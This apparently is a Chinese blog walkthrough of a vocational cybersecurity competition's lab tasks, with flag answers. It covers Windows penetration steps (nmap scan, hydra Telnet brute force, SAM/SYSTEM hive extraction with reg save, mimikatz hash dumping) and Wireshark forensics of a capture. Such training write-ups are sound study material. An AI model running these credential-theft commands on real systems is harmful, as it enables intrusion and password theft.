网络安全比赛解析

已于 2022-09-05 13:42:12 修改
阅读量1.2k 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 网络 安全
于 2022-09-05 13:40:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/saopigking/article/details/126703249
版权

B 模块安全事件响应/网络安全数据取证/应用安全(350 分)

B-1任务模块:Windows 操作系统渗透测试

1.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Windows 进行系统服务及版 本扫描渗透测试,并将该操作显示结果中 Telnet 服务对应的端口号作为 FLAG 提交;

nmap  -sV 192.168.5.56

在这里插入图片描述
Telnet 服务对应的端口号作为 FLAG 提交

FLAG{23}

2.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Windows 进行渗透测试,使 用 kali 中 hydra 对服务器 Telnet 服务进行暴力破解(用户名为 teltest), 将 hydra 使用的必要参数当做 FLAG 进行提交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dirb/small.txt)

首先开启Telnet服务,创建teltest账户否则无法成功破解密码!!!!!

windows7 telnet服务开启和登录授权__荣耀之路_的博客-CSDN博客

创建密码字典,比赛的时候会自带
在这里插入图片描述

hydra -l teltest -P pass.txt 192.168.5.56 telnet -vV

在这里插入图片描述

flag值:{hydra -l teltest -P pass.txt 192.168.5.56 telnet -vV}

具体命令可以看笔记上的hydar工具使用

以上环境全部配置好后,密码破解就成功了

3.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Windows 进行渗透测试,使 用 kali 中 hydra 对服务器 Telnet 服务进行暴力破解(用户名为 teltest), 将破解成功的密码当做 FLAG 进行提交;(字典路径 /usr/share/wordlists/dirb/small.txt)

根据上提得知密码

flag值:{123456}

首先通过kali渗透系统远程控制靶机桌面

安装rdesktop: apt-get install rdesktop
安装tsclient: apt-get install tsclient  
rdesktop 192.168.5.56 // 靶机地址

4.通过本地 PC 中渗透测试平台 win7 对服务器场景 Windows 进行渗透测试,取 得的账户密码有远程桌面权限,将该场景系统中 sam 文件使用 reg 相关命令 提取,将完整命令作为 FLAG 提交;

提取文件前用管理员模式打开cmd,在进入c盘下就可以直接把文件保存在c盘下。如下操作:

img

Flag:reg save HKLM\SAM sam.hive

5.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;

Flag:reg save HKLM\SYSTEM system.hive

img

6.提取teltest密码信息

通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取teltest密码信息,将提取信息的命令作为FLAG提交;

执行完上面的题可以发现生成了两个文件

在这里插入图片描述

把文件下载到本地

img

或者不下载到本地,通过远程控制win7找到sam.hive 与system.hive文件的位置放到c盘

用mimikatz工具解密

lsadump::sam /sam:C:\sam.hive /system:C:\system.hive

如提取的sam.hive 与system.hive文件没有放到c盘则找到文件所在的位置。

lsadump::sam /sam:C:\Windows\System32\sam.hive /system:C:\Windows\System32\system.hiv

PS:一般来说提取出来的文件默认在C:\Windows\System32位置下

放到windows7桌面mimimkatz软件进行解密

img

Flag:e452b0dfd950fabe692f48c63061641d

7.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取administrators密码信息,将提取到的hash值作为FLAG提交;

Flag: 6cfa9ce05f0afaa483beaea6567ea26e

根据上一题可以解出

img

B-3任务模块:信息取证分析

题目一样数据包不一样

1.从靶机服务器的 FTP 上下载 wireshark0817.pcap 数据包文件,找出黑客获取 到的可成功登录目标服务器 FTP 的账号密码,并将黑客获取到的账号密码作 为 Flag 值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交;

筛选命令:ftp and tcp contains "Login"或者ftp and tcp contains "230"

找到两个相关的包
在这里插入图片描述

查看tpc跟踪流,得到黑客成功登录的账号密码
在这里插入图片描述

flag:{admin,admin654321}

2.继续分析数据包 wireshark0817.pcap,找出黑客使用获取到的账号密码登录 广西壮族自治区第二届职业技能大赛 7 / 10 FTP 的时间,并将黑客登录 FTP 的时间作为 Flag 值(例如:14:22:08)提交;

在这里插入图片描述

flag:{01:32:44}

3.继续分析数据包 wireshark0817.pcap,找出黑客连接 FTP 服务器时获取到的 FTP 服务版本号,并将获取到的 FTP 服务版本号作为 Flag 值提交;

在这里插入图片描述

flag:{vsFTPd 3.0.2}

4.继续分析数据包 wireshark0817.pcap,找出黑客成功登录 FTP 服务器后执行 的第一条命令,并将执行的命令作为 Flag 值提交;

继续根据第一题查看tcp流发现ftp的版本

在这里插入图片描述

flag:{ls}

5.继续分析数据包 wireshark0817.pcap,找出黑客成功登录 FTP 服务器后下载 的关键文件,并将下载的文件名称作为 Flag 值提交;

在这里插入图片描述

flag:{flag123.txt}

6.继续分析数据包 wireshark0817.pcap,找出黑客暴力破解目标服务器 Telnet 服务并成功获取到的用户名与密码,并将获取到的用户名与密码作为 Flag 值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交;

筛选规则

 telnet and tcp contains “pass”

在这里插入图片描述

flag:{root,toor654321}

7.继续分析数据包 wireshark0817.pcap,找出黑客在服务器网站根目录下添加 的文件,并将该文件的文件名称作为 Flag 值提交;

在这里插入图片描述

flag:{admin654321}

8.继续分析数据包 wireshark0817.pcap,找出黑客在服务器系统中添加的用户, 并将添加的用户名与密码作为 Flag 值(用户名与密码之间以英文逗号分隔, 例如:root,toor)提交。
在这里插入图片描述

flag:{user123,123456}
网络安全菜鸡
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
中职生网络安全 2021年湖南省省赛 赛题解析
04-20
以上是对2021年湖南省中职生网络安全竞赛的部分赛题解析。这些题目覆盖了信息收集、数据库服务渗透测试、web服务渗透测试以及数字取证等多个方面,旨在全面考核参赛选手在网络安全领域的实际操作能力。通过解决这些...
2022年中职组云南省昆明市网络安全竞赛试题
旺仔Sec&blog
01-17 1749
2022年中职组云南省昆明市网络安全竞赛试题
中职网络安全B模块Windows 操作系统渗透测试2023年湖南省
FRANXX_02的博客
11-29 1547
2.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,使用kali中 hydra 对服务器 Telnet 服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做 FLAG 进行提交(例:nmap -s -p 22);6.通过本地 PC 中渗透测试平台 win7 对服务器场景进行渗透测试,将sam文件与 system 文件提取到本地,使用桌面 mimikatz 工具提取teltest密码信息,将提取信息的命令作为 FLAG 提交;
2021年山东省中职组网络安全省赛B模块windows渗透解析
qq_57147160的博客
12-13 6194
B-10任务十:Windows操作系统渗透测试任务环境说明:●服务器场景:Server2(封闭链接)●服务器场景操作系统:Windows7 1.通过本地PC中渗透测试平台Kali对服务器场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交; 首先第一道题目就非常简单,直接使用nmap -sV 版本扫描进行得出flag: Flag:23 2.通过本地PC中渗透测试平台Kali对服务器场景
2021 年山东省职业院校技能大赛中职组“网络安全” 赛项
热门推荐
Jay
12-01 1万+
2021 年山东省职业院校技能大赛 中职组“网络安全” 赛项 竞赛题库 网络安全赛项专家组 2021 年 11 月 赛题说明 一、 竞赛时间安排与分值权重 二、 竞赛拓扑图 模块编号 模块名称 竞赛时间 (小时) 权值 A 基础设施设置与安全加固 3 20% B 网络安全事件响应、 数字取证调查和应用安全 40% C CTF 夺旗-攻击 3 20% D CTF 夺旗-防御 20% 总计 6
2022全国职业技能大赛-网络安全赛题解析总结⑤(超详细)
Aluxian_的博客
05-18 3405
2022全国职业技能大赛-网络安全赛题解析总结(自己得思路)模块A 基础设施设置与安全加固(20分)模块B 网络安全事件响应、数字取证调查和应用安全(40分)模块C CTF夺旗-攻击(20分)模块D CTF夺旗-防御(20分)有什么不懂得可以联系博主!交流群:603813289 模块A 基础设施设置与安全加固(20分) 二、竞赛注意事项 1.比赛期间禁止携带和使用移动存储设备、计算器、通信工具及参考资料。 2.请根据大赛所提供的比赛环境,检查所列的硬件设备、软件清单、材料清单是否齐全,计算机设备是否能正
2017中职网络空间安全解析
06-17
数据库安全同样在网络安全中占有重要的位置,数据库弱口令利用等知识点的解析,旨在提高网络安全人员对数据库安全的认识,增强防御措施。 最后,本书通过提供赛题解析和相关得分要点,帮助学习者不仅理解知识点,还...
网络安全竞赛题库银行综合保险类
07-31
网络安全竞赛题库中的银行综合保险类题目通常涵盖了网络安全、信息安全、数据保护以及相关法律法规等多个方面。以下是一些可能的题目示例及答案解析,供您参考: 一、选择题 用户收到了一封可疑的电子邮件,要求...
中职网络安全竞赛数据包分析attack18.pcapng
12-20
《中职网络安全竞赛数据包分析:解密"attack18.pcapng"》 在2022年的中职组网络安全国赛省赛中,参赛者们面临了一项极具挑战性的任务——分析"attack18.pcapng"数据包。这个文件是网络流量捕获的一种记录格式,用于...
网络安全实操题目.docx
10-12
2020年全国行业职业技能竞赛 全国网络与信息安全管理职业技能大赛操作技能赛题(B卷)
​数据链路层——流量控制&可靠传输机制 ​
qq_25467441的博客
09-09 726
例题:一个信道的数据传输率为4kb/s ,单向传播时延为30ms ,如果使停止-等待协议的信道最大利用率达到80%,要求的数据帧长度至少为。设数据帧的长度为L比特,则发送方发送全部的数据需要时间:L/4。“停止-等待”就是每发送完一个分组就停止发送,等待对方确认,在收到确认后再发送下一个分组。因为是在讨论可靠传输的原理,所以并不考虑数据是在哪一个层次上传送的。发送方在一个发送周期内,有效地发送数据所需要的时间占整个发送周期的比率。数据链路层的流量控制是点对点的,而传输层的流量控制是端到端的。
200 Gb/s和400 Gb/s网络
dncsk的专栏
09-07 1420
116.200 Gb/s和400 Gb/s网络简介写在前面 :1.需要英文原文请自行官网下载2.本人无授权故亦不接受相关付费服务 如有商业性需求建议寻找有资质的书籍供应商购买3.翻译纯粹为爱发电,因为机器翻译所以错乱较多 建议参照英文原文对比使用 4.欢迎评论区提出建议或意见 原则上不删除评论 原则上不回复私信 和解呈现200GBASE-RPCSPMDIEEEStd802.3-2022,IEEE以太网标准第八节116.200Gb/s和400Gb/s网络116.1概述116.1范围本条款描述了200千兆位和4
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-11 788
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
[网络]HTTP协议 Cookie与Session
m0_74910646的博客
09-07 777
HTTP Cookie(也称为 Web Cookie、浏览器 Cookie 或简称 Cookie)是服务器发送到 用户浏览器并保存在浏览器上的一小块数据,它会在浏览器之后向同一服务器再次发 起请求时被携带并发送到服务器上。通常,它用于告知服务端两个请求是否来自同一浏览器,如保持用户的登录状态、记录用户偏好等。HTTP Session 是服务器用来跟踪用户与服务器交互期间用户状态的机制。由于 HTTP 协议是无状态的(每个请求都是独立的),因此服务器需要通过 Session 来记住用户的信息。
145-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务
DamnVanish的博客
09-07 846
Linux中最强权限维持rootkit
网络安全宣传周 | DNS安全威胁与应对措施分享
最新发布
weixin_53018687的博客
09-12 626
然而,DNS协议在设计初期只注重功能的实现,未充分考虑安全验证机制,缺乏有效的安全防御手段,DNS协议数据包往往能够在网络中畅通无阻,为攻击者提供了可乘之机,这一天生的设计缺陷使得DNS系统天然地成为了安全领域的薄弱环节。DNS劫持:DNS劫持是指攻击者通过篡改DNS解析结果,将用户的流量重定向到不同的IP地址,通常是恶意网站。DNS泛洪攻击:DNS洪泛攻击是一种拒绝服务攻击,攻击者通过发送大量的DNS请求,通常是伪造的或毫无意义的查询,消耗DNS服务器的资源,使其无法响应合法的查询请求。
网络分析仪仪器校准要怎么进行检测?容易出现哪些误差?
2401_83476848的博客
09-12 249
误差修正是对已知校准标准的测量,这些测量值存储在分析仪的存储器之中,数据用于计算误差模型。系统误差是由矢量网络分析仪和测试设置之中的缺陷引起的,是重复性误差,并假设它不随时间变化。校准件的使用可以达到减少误差的目的。2.开关重复性误差:分析仪中用于切换源衰减器设置的机械式RF开关,有时当机械式RF开关被启动时,触点的闭合方式与上次启动时不同。通过仪器校准措施增强,消除反射测量之中的三个系统误差:指向性、源匹配、频率响应。:是由于仪器或测试系统仪器校准之后性能发生变化引起的,主要是温度变化引起的。
.[[BitCloud@cock.li]].wstop勒索病毒数据怎么处理|数据解密恢复
数据恢复研究℃
09-11 797
导言随着网络技术的不断发展,勒索病毒已经成为网络安全领域的一大威胁。其中,.[[]].wstop、[[BitCloud@cock.li]].wstop 、[[BaseData@airmail.cc]].wstop勒索病毒作为一种新型的恶意软件,以其复杂的加密技术和隐蔽的传播方式,给个人和企业带来了巨大的数据安全和经济损失风险。本文将详细介绍.[[
综合DHCP、ACL、NAT、Telnet和PPPoE进行网络设计练习
m0_62909438的博客
09-07 1144
通过学习到的DHCP、NAT、ACL、Telnet和PPPoE技术,进行综合实验配置,掌握这些技术的配置,了解其用法,加深命令印象。
网络安全知识竞赛试题解析
"网络安全知识竞赛(C卷)是一个包含100道题目的测试,涵盖了网络安全的基础知识,包括单选、多选和判断题。题目涉及的信息安全要素、主机安全策略、入侵防御、ISO安全服务、安全级别标准以及操作系统安全等方面。" 1...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络安全菜鸡

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值